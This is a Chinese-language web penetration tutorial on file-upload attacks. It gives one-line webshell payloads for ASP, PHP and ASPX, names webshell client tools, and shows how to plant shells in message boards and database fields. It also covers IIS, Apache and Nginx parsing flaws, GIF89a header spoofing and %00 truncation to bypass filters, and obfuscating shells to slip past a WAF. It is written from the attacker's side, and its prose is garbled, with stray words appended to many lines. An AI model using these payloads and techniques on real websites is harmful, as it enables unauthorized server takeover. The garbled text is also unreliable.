web滲透測試(上傳漏洞)

一句話木馬——php

一句話木馬短小精悍,並且功能強大,隱蔽性很是好,在入侵中扮演着強大的做用。nginx

黑客在註冊信息的電子郵箱或者我的主頁等插入相似以下代碼:web

<%execute request(「value」)%> 其中value是值,因此你能夠更改本身的值,前面的request就是獲取這個值 <%eval request(「value」)%>(如今比較常見,並且字符少,對錶單字數有限制的地方特別有用)。shell

當知道了數據庫的url,就能夠利用本地一張網頁進行鏈接獲得webshell,(不知道數據庫也能夠,只要知道<%eval request(「value」)%>這個文件被插入到哪個asp文件裏就能夠),這就被稱爲一句話木馬,基於B/S結構。數據庫

 

寫法——apache

Asp一句話:服務器

<%eval request(「xxx」)%>函數

 

Php 一句話:測試

<%php @eval($_POST[xxx]);?>網站

 

Aspx一句話:

<%@ Page Languag=」xxx」%>

<%eval(Request.Item[「xxx」])%>

 

 

鏈接木馬的客戶端——

中國菜刀,中國砍刀,lanker一句話客戶端,zv新型php一句話木馬客戶端

 

 

木馬的使用技巧——

首先找到數據庫是asp格式的網站,而後以留言板或者發表文章的方式把一句話添加到asp數據庫,或者加進asp網頁,記住!咱們的目的是把一句話<%execute request("xxx")% >添加到數據庫不管論任何方式!而後打開客戶端,填上加入了一句話的asp文件,或者是asp網頁,而後進入此網站服務器。

示例:網頁上傳webshell

 

上傳大馬後打開上傳的路勁xx.asp,並輸入密碼

 

webshell就拿到了

 

 

 

 

木馬的製做——

C32下作一句話打開c32,把圖片放裏面,寫入一句話保存退出

 

 

小馬與大馬的區別——

小馬體積小,容易隱藏,隱蔽性強,最重要在於與圖片結合一塊兒上傳以後能夠利用nginxIS的解析漏洞來運行,不過功能少,通常只有上傳等功能。大馬體積比較大通常50K以上。功能也多,通常都包括提權命令,磁盤管理,數據庫鏈接藉口,執行命令甚至有些以具有自帶提權功能和壓縮,解壓縮網站程序的功能。這種馬隱蔽性很差,而大多代碼如不加密的話不少殺毒廠商開始追殺此類程序

 

 

經過加密webshell過簡單的waf

變量經過函數加載進來,也就是打亂變量,從新組合,使變量複雜化,繞過防火牆

 

 

 

 

文件解析漏洞——

解析漏洞主要說的是一些特殊文件被iisapachenginx在某種狀況下解釋成腳本文件格士的漏洞。

 

Iis解析漏洞

1.目錄解析

當網站下創建文件夾的名字爲.asp.asa的文件夾,其目錄內的任何擴展名的文件都被iis看成asp文件來解析並執行,如建立目錄/xxx.asp/xx.jpg  xx.jpg被看成asp文件來執行,若是黑客能夠控制活上傳文件夾路徑,就能夠無論上傳後的圖片改不更名都能拿shell

2.符號後面不被解析——(可以使用抓包軟件改後綴)

在這種狀況下,分號後面的不被解析,也就是說xxx.asp;.jpg會被服務器當作是xxx.jpg

 

Apache解析漏洞

1.apache是從右到左開始判斷解析,若是爲不可識別解析,就再往左判斷,如xxx.php.owf.rar 」.owf」」.rar」這兩種後綴是apache解析不了的,apache就會把xxx.php.owf.rar解析成php.

怎麼去判斷是否是合法的後綴就是這個漏洞利用關鍵,測試時把常見的後綴都寫上,去測試是否是合法,任意不識別的後綴,逐級向上識別

 

 

文件頭欺騙漏洞——

在一句話木馬內容前面加入gif89a,如:gif89a <%eval request(「xx」)%> 而後將木馬保存爲圖片的格式,如xxx.jpgxx.gif文件頭欺騙能夠用來繞過簡單的waf

 

 

 

00截斷——

找到上傳漏洞後,打開選擇上傳的一句話木馬,打開抓包軟件,進行00截斷,把抓到的數據包改成%00

 

選取%00

 

變成16進制

 

 

放包

 

複製路經後,web訪問測試,用菜刀鏈接放大馬

 

相關文章
相關標籤/搜索